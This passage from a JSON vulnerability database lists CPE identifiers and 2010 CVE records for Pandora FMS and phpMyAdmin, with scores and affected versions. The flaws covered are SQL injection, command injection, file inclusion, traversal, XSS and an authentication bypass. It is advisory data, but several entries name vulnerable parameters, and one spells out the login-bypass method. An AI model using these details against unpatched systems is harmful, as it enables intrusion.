"cpe:2.3:a:ifdefined:bugtracker.net:2.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:0.91:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.5.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.9:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.7.8:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.6.7:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.4:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.8.1:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:2.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:ifdefined:bugtracker.net:3.3.9:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:45:37", "description": "Multiple SQL injection vulnerabilities in Pandora FMS before 3.1.1 allow remote authenticated users to execute arbitrary SQL commands via (1) the id_group parameter in an operation/agentes/ver_agente action to ajax.php or (2) the group_id parameter in an operation/agentes/estado_agente action to index.php, related to operation/agentes/estado_agente.php.", "cvss3": {}, "published": "2010-12-02T17:15:00", "type": "cve", "title": "CVE-2010-4280", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4280"], "modified": "2018-10-10T20:07:00", "cpe": ["cpe:/a:artica:pandora_fms:1.2", "cpe:/a:artica:pandora_fms:2.1.1", "cpe:/a:artica:pandora_fms:3.0", "cpe:/a:artica:pandora_fms:2.1", "cpe:/a:artica:pandora_fms:1.3.1", "cpe:/a:artica:pandora_fms:1.3", "cpe:/a:artica:pandora_fms:3.1", "cpe:/a:artica:pandora_fms:2.0"], "id": "CVE-2010-4280", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4280", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:artica:pandora_fms:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta3:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:45:35", "description": "operation/agentes/networkmap.php in Pandora FMS before 3.1.1 allows remote authenticated users to execute arbitrary commands via shell metacharacters in the layout parameter in an operation/agentes/networkmap action to index.php.", "cvss3": {}, "published": "2010-12-02T17:13:00", "type": "cve", "title": "CVE-2010-4278", "cwe": ["CWE-78"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4278"], "modified": "2018-10-10T20:07:00", "cpe": ["cpe:/a:artica:pandora_fms:1.2", "cpe:/a:artica:pandora_fms:2.1.1", "cpe:/a:artica:pandora_fms:3.0", "cpe:/a:artica:pandora_fms:2.1", "cpe:/a:artica:pandora_fms:1.3.1", "cpe:/a:artica:pandora_fms:1.3", "cpe:/a:artica:pandora_fms:3.1", "cpe:/a:artica:pandora_fms:2.0"], "id": "CVE-2010-4278", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4278", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:artica:pandora_fms:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta3:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:45:41", "description": "PHP remote file inclusion vulnerability in extras/pandora_diag.php in Pandora FMS before 3.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the argv[1] parameter.", "cvss3": {}, "published": "2010-12-02T17:15:00", "type": "cve", "title": "CVE-2010-4283", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4283"], "modified": "2018-10-10T20:08:00", "cpe": ["cpe:/a:artica:pandora_fms:1.2", "cpe:/a:artica:pandora_fms:2.1.1", "cpe:/a:artica:pandora_fms:3.0", "cpe:/a:artica:pandora_fms:2.1", "cpe:/a:artica:pandora_fms:1.3.1", "cpe:/a:artica:pandora_fms:1.3", "cpe:/a:artica:pandora_fms:3.1", "cpe:/a:artica:pandora_fms:2.0"], "id": "CVE-2010-4283", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4283", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:artica:pandora_fms:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta3:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:45:40", "description": "Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.", "cvss3": {}, "published": "2010-12-02T17:15:00", "type": "cve", "title": "CVE-2010-4282", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4282"], "modified": "2018-10-10T20:07:00", "cpe": ["cpe:/a:artica:pandora_fms:1.2", "cpe:/a:artica:pandora_fms:2.1.1", "cpe:/a:artica:pandora_fms:3.0", "cpe:/a:artica:pandora_fms:2.1", "cpe:/a:artica:pandora_fms:1.3.1", "cpe:/a:artica:pandora_fms:1.3", "cpe:/a:artica:pandora_fms:3.1", "cpe:/a:artica:pandora_fms:2.0"], "id": "CVE-2010-4282", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4282", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:artica:pandora_fms:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta3:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:45:36", "description": "The default configuration of Pandora FMS 3.1 and earlier specifies an empty string for the loginhash_pwd field, which allows remote attackers to bypass authentication by sending a request to index.php with \"admin\" in the loginhash_user parameter, in conjunction with the md5 hash of \"admin\" in the loginhash_data parameter.", "cvss3": {}, "published": "2010-12-02T17:15:00", "type": "cve", "title": "CVE-2010-4279", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4279"], "modified": "2018-10-10T20:07:00", "cpe": ["cpe:/a:artica:pandora_fms:1.2", "cpe:/a:artica:pandora_fms:2.1.1", "cpe:/a:artica:pandora_fms:3.0", "cpe:/a:artica:pandora_fms:2.1", "cpe:/a:artica:pandora_fms:1.3.1", "cpe:/a:artica:pandora_fms:1.3", "cpe:/a:artica:pandora_fms:3.1", "cpe:/a:artica:pandora_fms:2.0"], "id": "CVE-2010-4279", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4279", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:artica:pandora_fms:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta2:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.2:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:1.3:beta3:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:3.1:*:*:*:*:*:*:*", "cpe:2.3:a:artica:pandora_fms:2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:46:25", "description": "Cross-site scripting (XSS) vulnerability in the PMA_linkOrButton function in libraries/common.lib.php in the database (db) search script in phpMyAdmin 2.11.x before 2.11.11.1 and 3.x before 3.3.8.1 allows remote attackers to inject arbitrary web script or HTML via a crafted request.", "cvss3": {}, "published": "2010-12-02T16:22:00", "type": "cve", "title": "CVE-2010-4329", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4329"], "modified": "2011-01-28T05:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin:2.11.9.1", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.5", "cpe:/a:phpmyadmin:phpmyadmin:2.11.11", "cpe:/a:phpmyadmin:phpmyadmin:3.3.2.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.10.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.8.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.1.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3", "cpe:/a:phpmyadmin:phpmyadmin:3.3.8", "cpe:/a:phpmyadmin:phpmyadmin:3.2.2", "cpe:/a:phpmyadmin:phpmyadmin:3.3.6", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.4", "cpe:/a:phpmyadmin:phpmyadmin:3.1.4", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.2", "cpe:/a:phpmyadmin:phpmyadmin:3.0.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.10.0", "cpe:/a:phpmyadmin:phpmyadmin:3.2.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.6", "cpe:/a:phpmyadmin:phpmyadmin:3.2.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.2", "cpe:/a:phpmyadmin:phpmyadmin:3.3.3.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.3.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.6.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.0.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2.2", "cpe:/a:phpmyadmin:phpmyadmin:2.11.7.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.0", "cpe:/a:phpmyadmin:phpmyadmin:3.1.2", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3.2", "cpe:/a:phpmyadmin:phpmyadmin:3.0.1.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.4.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.1.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.5.0", "cpe:/a:phpmyadmin:phpmyadmin:3.3.7", "cpe:/a:phpmyadmin:phpmyadmin:3.3.5.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.7.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.4.0", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.3", "cpe:/a:phpmyadmin:phpmyadmin:2.11.2.1", "cpe:/a:phpmyadmin:phpmyadmin:3.3.5.1", "cpe:/a:phpmyadmin:phpmyadmin:3.1.5", "cpe:/a:phpmyadmin:phpmyadmin:3.1.1", "cpe:/a:phpmyadmin:phpmyadmin:3.1.3.1", "cpe:/a:phpmyadmin:phpmyadmin:2.11.9.2"], "id": "CVE-2010-4329", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4329", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.8:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.1:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.5:rc1:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.7:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.4:rc2:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.9.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.0.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.3.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:3.1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.11:*:*:*:*:*:*:*", "cpe:2.3:a:phpmyadmin:phpmyadmin:2.11.10.1:*:*:*:*:*:*:*", 